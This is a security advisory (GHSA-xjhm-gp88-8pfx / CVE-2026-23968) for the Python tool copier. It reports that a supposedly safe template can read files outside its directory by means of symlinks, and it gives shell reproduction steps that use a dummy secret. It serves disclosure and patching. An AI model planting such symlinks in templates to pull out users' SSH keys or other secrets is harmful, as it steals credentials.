GHSA-xjhm-gp88-8pfx

Source

https://github.com/advisories/GHSA-xjhm-gp88-8pfx

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-xjhm-gp88-8pfx/GHSA-xjhm-gp88-8pfx.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-xjhm-gp88-8pfx

Aliases

CVE-2026-23968

Published

2026-01-21T22:08:48Z

Modified

2026-01-22T15:51:37.403035Z

Severity

6.8 (Medium) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N CVSS Calculator

Summary

Copier safe template has arbitrary filesystem read access via symlinks when _preserve_symlinks: false

Details

Impact

Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently include arbitrary files/directories outside the local template clone location by using symlinks along with <code>_preserve_symlinks: false</code> (which is Copier's default setting).

Imagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations and hopes for a user to push the generated project to a public location like github.com where the template author can extract the secrets.

Reproducible example:

Illegally include a file in the generated project via symlink resolution:

echo "s3cr3t" > secret.txt

mkdir src/
pushd src/
ln -s ../secret.txt stolen-secret.txt
popd

uvx copier copy src/ dst/

cat dst/stolen-secret.txt
#s3cr3t

Illegally include a directory in the generated project via symlink resolution:

mkdir secrets/
pushd secrets/
echo "s3cr3t" > secret.txt
popd

mkdir src/
pushd src/
ln -s ../secrets stolen-secrets
popd

uvx copier copy src/ dst/

tree dst/
# dst/
# └── stolen-secrets
#     └── secret.txt
#
# 1 directory, 1 file
cat dst/stolen-secrets/secret.txt
# s3cr3t

Patches

n/a

Workarounds

n/a

References

n/a

Database specific

{
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-21T22:08:48Z",
    "severity": "MODERATE",
    "nvd_published_at": "2026-01-21T23:15:52Z",
    "cwe_ids": [
        "CWE-61"
    ]
}

References

Affected packages

PyPI / copier

Package

Name: copier; View open source insights on deps.dev
Purl: pkg:pypi/copier

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

9.11.2

Affected versions

2.*

2.0.0

2.0.1

2.1.0

2.2.1

2.2.2

2.2.3

2.3

2.3.1

2.3.2

2.3.3

2.4.0

2.4.1

2.4.2

2.5.0

2.5.1

3.*

3.0.0a3

3.0.0a5

3.0.0a6

3.0.0a7

3.0.0a8

3.0.0b1

3.0.1

3.0.2

3.0.3

3.0.4

3.0.5

3.0.6

3.1.0

3.2.0

4.*

4.0.0

4.0.1

4.0.2

4.1.0

5.*

5.0.0

5.1.0

6.*

6.0.0a0

6.0.0a2

6.0.0a3

6.0.0a4

6.0.0a5

6.0.0a6

6.0.0a7

6.0.0a9

6.0.0b0

6.0.0

6.1.0

6.2.0

7.*

7.0.1

7.1.0a0

7.1.0

7.2.0

8.*

8.0.0

8.1.0

8.2.0

8.3.0

9.*

9.0.1

9.1.0

9.1.1

9.2.0

9.3.0

9.3.1

9.4.0

9.4.1

9.5.0

9.6.0

9.7.0

9.7.1

9.8.0

9.9.0

9.9.1

9.10.0

9.10.1

9.10.2

9.10.3

9.11.0

9.11.1

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-xjhm-gp88-8pfx/GHSA-xjhm-gp88-8pfx.json"